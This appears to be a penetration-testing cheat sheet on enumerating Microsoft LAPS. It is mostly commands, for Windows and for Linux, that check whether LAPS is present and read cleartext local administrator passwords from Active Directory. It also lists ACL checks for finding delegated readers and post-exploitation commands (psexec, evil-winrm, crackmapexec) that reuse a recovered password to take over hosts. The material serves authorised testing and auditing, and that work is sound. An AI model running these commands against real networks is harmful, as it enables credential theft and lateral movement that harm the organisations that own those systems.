LAPS Enumeration

Overview

LAPS (Local Administrator Password Solution) manages local admin passwords on domain-joined machines. Passwords are stored in Active Directory as the ms-Mcs-AdmPwd attribute. If you have read access to this attribute, you get the local admin password in cleartext.

Check if LAPS is Installed

On Target

reg query "HKLM\SOFTWARE\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled 2>nul

Get-ChildItem 'C:\Program Files\LAPS\CSE\AdmPwd.dll' -ErrorAction SilentlyContinue

dir "C:\Program Files\LAPS" 2>nul

Check AD Schema

Get-ADObject "CN=ms-Mcs-AdmPwd,CN=Schema,CN=Configuration,DC=domain,DC=local" -ErrorAction SilentlyContinue

Read LAPS Password

PowerShell (AD Module)

Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd,ms-Mcs-AdmPwdExpirationTime | Where-Object { $_.'ms-Mcs-AdmPwd' -ne $null } | Select Name, 'ms-Mcs-AdmPwd', 'ms-Mcs-AdmPwdExpirationTime'

Specific Computer

Get-ADComputer TARGET-PC -Properties ms-Mcs-AdmPwd | Select Name, 'ms-Mcs-AdmPwd'

PowerView

Get-DomainComputer -Properties samaccountname,ms-mcs-admpwd | Where-Object { $_.'ms-mcs-admpwd' -ne $null }

LAPS Toolkit

https://github.com/leoloobeek/LAPSToolkit

Import-Module .\LAPSToolkit.ps1

# Find computers with LAPS
Find-LAPSDelegatedGroups
Find-AdmPwdExtendedRights

# Get passwords
Get-LAPSComputers

From Linux (Remote)

CrackMapExec

crackmapexec ldap DC_IP -u user -p password --module laps

ldapsearch

ldapsearch -x -H ldap://DC_IP -D "[email protected]" -w "password" -b "DC=domain,DC=local" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd ms-MCS-AdmPwdExpirationTime sAMAccountName

Impacket

impacket-GetADUsers -all domain.local/user:password -dc-ip DC_IP

pyLAPS

https://github.com/p0dalirius/pyLAPS

python3 pyLAPS.py -u user -p password -d domain.local --dc-ip DC_IP

LAPS v2 (Windows LAPS)

Windows LAPS (newer) stores passwords in msLAPS-Password attribute (encrypted).

Check

Get-ADComputer -Filter * -Properties msLAPS-Password | Where-Object { $_.'msLAPS-Password' -ne $null }

Read with Authorized Account

Get-LapsADPassword -Identity TARGET-PC -AsPlainText

Who Can Read LAPS?

Find Delegated Groups

Find-AdmPwdExtendedRights -Identity "OU=Workstations,DC=domain,DC=local"

Check ACLs

(Get-ACL "AD:CN=TARGET-PC,OU=Computers,DC=domain,DC=local").Access | Where-Object { $_.ObjectType -match ".*AdmPwd.*" }

Post-Exploitation

# Use found password
crackmapexec smb TARGET -u Administrator -p 'LAPSPassword123'
impacket-psexec domain.local/Administrator:'LAPSPassword123'@TARGET
evil-winrm -i TARGET -u Administrator -p 'LAPSPassword123'

Quick Reference

Tool	Where	Notes
PowerShell AD module	Target	Get-ADComputer
PowerView	Target	Get-DomainComputer
LAPSToolkit	Target	Find delegated groups
CrackMapExec	Attacker	—module laps
ldapsearch	Attacker	Direct LDAP query
pyLAPS	Attacker	Standalone Python

Documentation Index

​Overview

​Check if LAPS is Installed

​On Target

​Check AD Schema

​Read LAPS Password

​PowerShell (AD Module)

​Specific Computer

​PowerView

​LAPS Toolkit

​From Linux (Remote)

​CrackMapExec

​ldapsearch

​Impacket

​pyLAPS

​LAPS v2 (Windows LAPS)

​Check

​Read with Authorized Account

​Who Can Read LAPS?

​Find Delegated Groups

​Check ACLs

​Post-Exploitation

​Quick Reference